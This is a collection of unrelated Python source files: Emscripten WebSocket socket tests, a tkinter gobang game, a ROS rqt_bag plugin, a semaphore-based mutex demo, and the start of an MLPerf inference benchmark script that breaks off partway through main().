# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
open(os.path.join(self.get_dir(), 'websocket_pre.js'), 'w').write('''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
self.run_process([EMCC, '-Werror', path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js', 'websocket_pre.js', '-s', 'SOCKET_DEBUG=1', '-DSOCKK=12345'], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest(path_from_root('tests', 'websocket', 'test_websocket_send.c'), expected='101', args=['-lwebsocket', '-s', 'NO_EXIT_RUNTIME=1', '-s', 'WEBSOCKET_DEBUG=1'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools', 'websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest(path_from_root('tests', 'websocket', 'tcp_echo_client.cpp'), expected='101', args=['-lwebsocket', '-s', 'PROXY_POSIX_SOCKETS=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
|
tk_game.py
|
import os
import re
import time
import threading
import thread_stop
from gobang import Chess
from gobang import aiChess
from gobang import dicttoChees
import tkinter as tk
import tkinter.messagebox
import tkinter.filedialog
from PIL import ImageTk, Image
times = int(time.time())
# 加载资源文件夹
base_folder = os.path.dirname(__file__)
source_folder = os.path.join(base_folder, 'source')
img_folder = os.path.join(source_folder, 'img')
ex_folder = os.path.join(source_folder, 'ex')
root = tk.Tk()
# 设置标题
root.title("简单的python五子棋")
# 设置图标
root.iconphoto(False, tk.PhotoImage(file=os.path.join(img_folder, 'icon.png')))
# 定义宽高
WIDTH = 900
HEIGHT = 667
# 定义网格
LENGTH = 44
START = 22
# 窗口大小固定
root.minsize(WIDTH, HEIGHT)
root.maxsize(WIDTH, HEIGHT)
# 选项配置
order_checkbutton_var = tk.IntVar()
order = False
putlist_checkbutton_var = tk.IntVar()
putlist = False
# 创建画布
canvas = tk.Canvas(root,
width=WIDTH,
height=HEIGHT,
bd=0,
highlightthickness=0)
# 设置背景颜色
background = ImageTk.PhotoImage(
Image.open(os.path.join(img_folder, 'background_c.png')))
canvas.create_image(0, 0, anchor='nw', image=background)
canvas.pack()
# /////////////// #
# 主体开始 #
# /////////////// #
def game_exit():
# 游戏退出
if tkinter.messagebox.askyesno('退出游戏提示', '要退出游戏吗?'):
os._exit(0)
def open_gs():
# 打开棋谱文件 TODO
gs_file = tkinter.filedialog.askopenfilename(title="选择棋谱",
initialdir=ex_folder,
filetypes=[("棋谱文件", ".sgf"),
("棋谱文件", ".gbs"),
("Gobang棋谱文件",
".gbs")])
if gs_file != '':
try:
with open(gs_file, encoding='utf-8') as f:
gs_text = f.read()
except UnicodeDecodeError:
with open(gs_file) as f:
gs_text = f.read()
finally:
step_dict = {}
step_list = re.findall(r"[\[']([a-z][a-z])['\]]", gs_text)
for i in range(len(step_list)):
step_dict[i + 1] = step_list[i]
score_mode(step_dict)
def save_gbs():
# 保存棋谱文件 `gbs` 格式
gbs_data = tkinter.filedialog.asksaveasfile(mode='w',
title="选择棋谱",
initialdir=ex_folder,
defaultextension=".espace",
filetypes=[("Gobang棋谱文件",
".gbs")])
if gbs_data is not None:
gbs_data.write(str(Chess.getStep()))
def click(event):
if not w.isWin() and not b.isWin():
ismove_x = False
ismove_y = False
if 10 < event.x < 650 and 10 < event.y < 650:
if (event.x - START) % LENGTH < 20:
x = (event.x - START) // LENGTH
ismove_x = True
elif (event.x - START) % LENGTH > 24:
x = ((event.x - START) // LENGTH) + 1
ismove_x = True
if (event.y - START) % LENGTH < 20:
y = (event.y - START) // LENGTH
ismove_y = True
elif (event.y - START) % LENGTH > 24:
y = ((event.y - START) // LENGTH) + 1
ismove_y = True
if ismove_x and ismove_y:
move(y, x)
def move(y, x):
# 落子
global times
if not w.isWin() and not b.isWin():
if w.isPlayer():
if w.moveChessmen(y, x):
draw()
elif b.isPlayer():
if b.moveChessmen(y, x):
draw()
if w.isWin():
tkinter.messagebox.showinfo('提示', '白方获胜!')
if b.isWin():
tkinter.messagebox.showinfo('提示', '黑方获胜!')
def draw(step_dict=None):
# 绘制棋盘
canvas.delete('Piece')
color = {1: 'black', 0: 'white'}
if step_dict is None:
step_dict = Chess.getStep().copy()
for step in step_dict.items():
row = ord(step[1][0]) - 97
column = ord(step[1][1]) - 97
y1 = START + (LENGTH * row) - 20
x1 = START + (LENGTH * column) - 20
y2 = START + (LENGTH * row) + 20
x2 = START + (LENGTH * column) + 20
canvas.create_oval(x1,
y1,
x2,
y2,
fill=color[(step[0] % 2)],
tags='Piece')
if step[0] == len(step_dict.items()):
canvas.create_oval(x1 + 15,
y1 + 15,
x2 - 15,
y2 - 15,
fill='pink',
tags='Piece')
if order:
canvas.create_text(x1 + 20,
y1 + 20,
text=str(step[0]),
fill=color[int(not bool((step[0] % 2)))],
tags='Piece')
# print(draw_list) # 测试输出
def regret():
if len(Chess.step) != 0:
if b.isPlayer():
if w.regret():
draw()
elif w.isPlayer():
if b.regret():
draw()
def tips():
# 提示
if len(Chess.getStep().items()) == 0:
b.moveChessmen(7, 7)
# elif not M:
else:
rc = aiChess()
move(rc[0], rc[1])
draw()
def new():
# 新局
if tkinter.messagebox.askyesno('重新开始', '要重新开始游戏吗?'):
Chess.new()
draw()
def sign(event):
# 获取鼠标实时位置,做出提示
# time.sleep(0.08)
canvas.delete("Sign")
ismove_x = False
ismove_y = False
if 10 < event.x < 650 and 10 < event.y < 650 and not w.isWin(
) and not b.isWin():
if (event.x - START) % LENGTH < 20:
x = (event.x - START) // LENGTH
ismove_x = True
elif (event.x - START) % LENGTH > 24:
x = ((event.x - START) // LENGTH) + 1
ismove_x = True
if (event.y - START) % LENGTH < 20:
y = (event.y - START) // LENGTH
ismove_y = True
elif (event.y - START) % LENGTH > 24:
y = ((event.y - START) // LENGTH) + 1
ismove_y = True
if ismove_x and ismove_y:
y1 = START + (LENGTH * y) - 20
x1 = START + (LENGTH * x) - 20
y2 = START + (LENGTH * y) + 20
x2 = START + (LENGTH * x) + 20
canvas.create_oval(x1 + 15,
y1 + 15,
x2 - 15,
y2 - 15,
fill='red',
tags='Sign')
def show_order():
# 是否显示落子序号
global order
order = bool(order_checkbutton_var.get())
draw()
def show_putlist():
# 输出日志信息
global putlist
putlist = bool(putlist_checkbutton_var.get())
def c_s():
# 获取鼠标实时位置,做出提示
canvas.bind("<Motion>", sign)
# 落子
canvas.bind("<ButtonRelease-1>", click)
def score_mode(step_dict):
canvas.delete('ButtonScore')
temp_dict = step_dict.copy()
Chess.new()
dicttoChees(step_dict)
draw()
def forward():
# 下一步
if len(temp_dict) != len(step_dict):
temp_dict.update(
{len(temp_dict) + 1: step_dict[len(temp_dict) + 1]})
dicttoChees(temp_dict)
draw()
def retreat():
# 上一步
if len(temp_dict) != 0:
temp_dict.popitem()
dicttoChees(temp_dict)
draw()
def play():
def stop():
thread_stop.stop_thread(t)
regret_button = tk.Button(root, text='⏩', command=play)
canvas.create_window(767,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
regret_button = tk.Button(root, text='⏸', command=stop)
canvas.create_window(767,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
nonlocal temp_dict
if len(temp_dict) == len(step_dict):
temp_dict = {}
def play_t():
for i in range(len(step_dict) - len(temp_dict)):
forward()
time.sleep(1)
regret_button = tk.Button(root, text='⏩', command=play)
canvas.create_window(767,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
t = threading.Thread(target=play_t)
t.start()
regret_button = tk.Button(root, text='◀', command=retreat)
canvas.create_window(720,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
regret_button = tk.Button(root, text='⏩', command=play)
canvas.create_window(767,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
regret_button = tk.Button(root, text='▶', command=forward)
canvas.create_window(810,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
# 返回主菜单
return_button = tk.Button(root, text='返回主菜单', command=button_main)
canvas.create_window(720,
500,
anchor='nw',
width=120,
height=50,
window=return_button,
tags='ButtonScore')
def Test__():
# 保存测试
canvas.delete('ButtonMain')
def button_score():
# 初始化
c_s()
Chess.new()
draw()
canvas.delete('ButtonMain')
# 新局
open_gs_button = tk.Button(root, text='新局', command=new)
canvas.create_window(720,
100,
anchor='nw',
width=120,
height=50,
window=open_gs_button,
tags='ButtonScore')
# 载入棋谱
open_gs_button = tk.Button(root, text='载入棋谱', command=open_gs)
canvas.create_window(720,
190,
anchor='nw',
width=120,
height=50,
window=open_gs_button,
tags='ButtonScore')
# 悔棋
regret_button = tk.Button(root, text='悔棋', command=regret)
canvas.create_window(720,
280,
anchor='nw',
width=120,
height=50,
window=regret_button,
tags='ButtonScore')
# 保存棋谱
save_gbs_button = tk.Button(root, text='保存棋谱', command=save_gbs)
canvas.create_window(720,
370,
anchor='nw',
width=120,
height=50,
window=save_gbs_button,
tags='ButtonScore')
# 返回主菜单
return_button = tk.Button(root, text='返回主菜单', command=button_main)
canvas.create_window(720,
500,
anchor='nw',
width=120,
height=50,
window=return_button,
tags='ButtonScore')
def detector():
while True:
if len(w.getStep()) < len(b.getStep()) and not w.isWin() and not b.isWin():
tips()
def button_m():
# 人机对战菜单
c_s()
Chess.new()
draw()
global auto
auto = threading.Thread(target=detector)
auto.start()
canvas.delete('ButtonMain')
# 新局
open_gs_button = tk.Button(root, text='新局', command=new)
canvas.create_window(720,
100,
anchor='nw',
width=120,
height=50,
window=open_gs_button,
tags='ButtonM')
# 悔棋
regret_button = tk.Button(root, text='悔棋', command=regret)
canvas.create_window(720,
190,
anchor='nw',
width=120,
height=50,
window=regret_button,
tags='ButtonM')
# 提示
tips_button = tk.Button(root, text='提示', command=tips)
canvas.create_window(720,
280,
anchor='nw',
width=120,
height=50,
window=tips_button,
tags='ButtonM')
# 保存棋谱
save_gbs_button = tk.Button(root, text='保存棋谱', command=save_gbs)
canvas.create_window(720,
370,
anchor='nw',
width=120,
height=50,
window=save_gbs_button,
tags='ButtonM')
# 返回主菜单
return_button = tk.Button(root, text='返回主菜单', command=button_main)
canvas.create_window(720,
460,
anchor='nw',
width=120,
height=50,
window=return_button,
tags='ButtonM')
def button_main():
# 主菜单函数
canvas.delete('ButtonScore')
canvas.delete('ButtonM')
canvas.delete('ScoreMode')
# 解绑事件
canvas.unbind("<ButtonRelease-1>")
canvas.unbind("<Motion>")
try:
thread_stop.stop_thread(auto)
except:
pass
# 人机对战按钮
man_machine_button = tk.Button(root, text='人机对战', command=button_m)
canvas.create_window(720,
100,
anchor='nw',
width=120,
height=50,
window=man_machine_button,
tags='ButtonMain')
# 打谱模式按钮
score_button = tk.Button(root, text='打谱模式', command=button_score)
canvas.create_window(720,
190,
anchor='nw',
width=120,
height=50,
window=score_button,
tags='ButtonMain')
# 退出游戏按钮
game_exit_button = tk.Button(root, text='退出游戏', command=game_exit)
canvas.create_window(720,
280,
anchor='nw',
width=120,
height=50,
window=game_exit_button,
tags='ButtonMain')
# 测试按钮
# debug_button = tk.Button(root, text='测试按钮', command=Test__)
# canvas.create_window(720,
# 460,
# anchor='nw',
# width=120,
# height=50,
# window=debug_button,
# tags='ButtonMain')
b = Chess('b', player_name="Computer.Python.AI", can_regret=True)
w = Chess('w', player_name="Computer.Python.AI", can_regret=True)
order_checkbutton = tk.Checkbutton(root,
text="显示序号",
variable=order_checkbutton_var,
onvalue=1,
offvalue=0,
height=5,
width=20,
command=show_order)
canvas.create_window(667,
617,
anchor='nw',
width=120,
height=50,
window=order_checkbutton,
tags='Checkbutton')
putlist_checkbutton = tk.Checkbutton(root,
text="输出LOG",
variable=putlist_checkbutton_var,
onvalue=1,
offvalue=0,
height=5,
width=20,
command=show_putlist)
canvas.create_window(787,
617,
anchor='nw',
width=120,
height=50,
window=putlist_checkbutton,
tags='Checkbutton')
button_main()
# 关闭提示
root.protocol("WM_DELETE_WINDOW", game_exit)
root.mainloop()
|
bag.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import argparse
import threading
from qt_gui.plugin import Plugin
from .bag_widget import BagWidget
class Bag(Plugin):
"""
Subclass of Plugin to provide interactive bag visualization, playing(publishing) and recording
"""
def __init__(self, context):
"""
:param context: plugin context hook to enable adding widgets as a ROS_GUI pane, ''PluginContext''
"""
super(Bag, self).__init__(context)
self.setObjectName('Bag')
args = self._parse_args(context.argv())
self._widget = BagWidget(context, args.clock)
if context.serial_number() > 1:
self._widget.setWindowTitle(
self._widget.windowTitle() + (' (%d)' % context.serial_number()))
context.add_widget(self._widget)
def load_bags():
for bagfile in args.bagfiles:
self._widget.load_bag(bagfile)
load_thread = threading.Thread(target=load_bags)
load_thread.start()
def _parse_args(self, argv):
parser = argparse.ArgumentParser(prog='rqt_bag', add_help=False)
Bag.add_arguments(parser)
return parser.parse_args(argv)
@staticmethod
def _isfile(parser, arg):
if os.path.isfile(arg):
return arg
else:
parser.error("Bag file %s does not exist" % (arg))
@staticmethod
def add_arguments(parser):
group = parser.add_argument_group('Options for rqt_bag plugin')
group.add_argument('--clock', action='store_true', help='publish the clock time')
group.add_argument('bagfiles', type=lambda x: Bag._isfile(parser, x),
nargs='*', default=[], help='Bagfiles to load')
def shutdown_plugin(self):
self._widget.shutdown_all()
def save_settings(self, plugin_settings, instance_settings):
# TODO implement saving
# instance_settings.set_value(k, v)
pass
def restore_settings(self, plugin_settings, instance_settings):
# TODO implement restoring
# v = instance_settings.value(k)
pass
# def trigger_configuration(self):
# TODO move some of the button functionality to config button if it is "more configy"
|
main_2.py
|
from threading import Thread, Semaphore
class Mutex:
def __init__(self):
self._token = Semaphore()
def __enter__(self):
self._token.acquire()
def __exit__(self, _1, _2, _3):
self._token.release()
count = 0
mu = Mutex()
def worker_a():
global count
with mu:
count += 1
def worker_b():
global count
with mu:
count += 1
a = Thread(target=worker_a)
b = Thread(target=worker_b)
a.start()
b.start()
a.join()
b.join()
print(count)
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
import re
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_pytorch":
(imagenet.Imagenet, dataset.pre_process_imagenet_pytorch, dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument('--tune', dest='tune', action='store_true',
help='tune best int8 model on calibration dataset')
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", default="output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", \
help="enable finding peak performance pass")
parser.add_argument("--debug", action="store_true", help="debug, turn traces on")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../../../utils/MLPerf/mlperf.conf", \
help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", \
help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", type=int, help="mlperf multi-stream sample per query")
parser.add_argument('--benchmark', dest='benchmark', action='store_true',
help='run benchmark')
parser.add_argument('--int8', dest='int8', action='store_true', help='run benchmark')
parser.add_argument("--tuned_checkpoint", default='./saved_results', type=str, metavar='PATH',
help='path to checkpoint tuned by Low Precision Optimization Tool (default: ./)')
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
return result["mAP"]
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
